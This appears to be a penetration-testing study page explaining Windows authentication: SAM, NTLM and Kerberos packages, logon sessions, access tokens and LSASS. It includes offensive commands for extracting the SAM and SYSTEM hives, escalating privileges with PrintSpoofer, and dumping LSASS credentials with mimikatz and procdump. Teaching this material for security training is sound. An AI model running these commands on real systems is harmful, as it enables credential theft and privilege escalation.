Windows Authentication

What You Will Learn

  • How Windows authenticates local and domain users
  • What authentication packages, logon sessions, and access tokens are
  • How NTLM and Kerberos authentication work
  • What LSASS does and why it is targeted by attackers

What Is It?

Windows authentication is the process by which Windows verifies the identity of a user and grants them access to the system. There are two main types: local and domain authentication.

Understanding Windows authentication is fundamental for penetration testing, Active Directory attacks, and lateral movement.

Authentication Types

Windows authentication can be grouped as:

  • Interactive Authentication: Windows asks the user for credentials (keyboard input)
  • Non-Interactive Authentication: The user does not specify credentials — used for services, network logons, and pass-the-hash attacks

Authenticating with a Local User

When a local user authenticates, Windows checks the credentials against the locally stored password hashes in the SAM (Security Account Manager) database.

# Location of SAM
C:\Windows\System32\config\SAM

# SAM is locked while Windows is running.
# Extract offline:
reg save hklm\sam sam.reg
reg save hklm\system system.reg

Authenticating with a Domain User

A domain user belongs to an Active Directory domain. When they authenticate, their credentials are compared against what is stored in the Domain Controller. Remote logins require administrative privileges.

Authentication Packages

Authentication packages are DLLs loaded by LSASS that handle the actual authentication logic. They verify credentials against a credential store.

Package Description
MSV1_0 Handles local (SAM) NTLM authentication
Kerberos Handles Active Directory Kerberos authentication
WDigest Older package — stores plaintext credentials in memory (disabled by default in Windows 8.1+)
NTLM Challenge-response authentication over the network

Logon Sessions

A logon session is created when a user successfully authenticates. Each session has a unique Locally Unique Identifier (LUID) and is associated with security tokens.

# List active logon sessions (requires elevated access)
Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4624}

Logon types:

Type Description
2 Interactive (local console)
3 Network (SMB, mapped drives)
4 Batch (scheduled tasks)
5 Service
10 RemoteInteractive (RDP)

Access Tokens

When a user authenticates, Windows creates an access token — a kernel object that describes the security context of the process.

  • Primary Token (Process Token): Assigned to every process. Represents the user who started the process.
  • Impersonation Token (Thread Token): Allows a thread to temporarily act as a different user (e.g., a service acting on behalf of a client).
# View current user and privileges
whoami /all

# Check token privileges (look for SeImpersonatePrivilege)
whoami /priv

Token Abuse

If you have SeImpersonatePrivilege (common for service accounts), you can impersonate privileged tokens:

# Tools that exploit token impersonation:
# - PrintSpoofer
# - JuicyPotato
# - GodPotato
.\PrintSpoofer.exe -i -c cmd.exe

LSASS

The Local Security Authority Subsystem Service (LSASS) process (lsass.exe) handles authentication, stores credentials in memory, and manages security tokens.

LSASS is a primary target for credential dumping:

# Dump LSASS memory with mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

# Create a minidump of LSASS (no AV needed)
tasklist | findstr lsass
procdump.exe -ma lsass.exe lsass.dmp

Resources


This site uses Just the Docs, a documentation theme for Jekyll.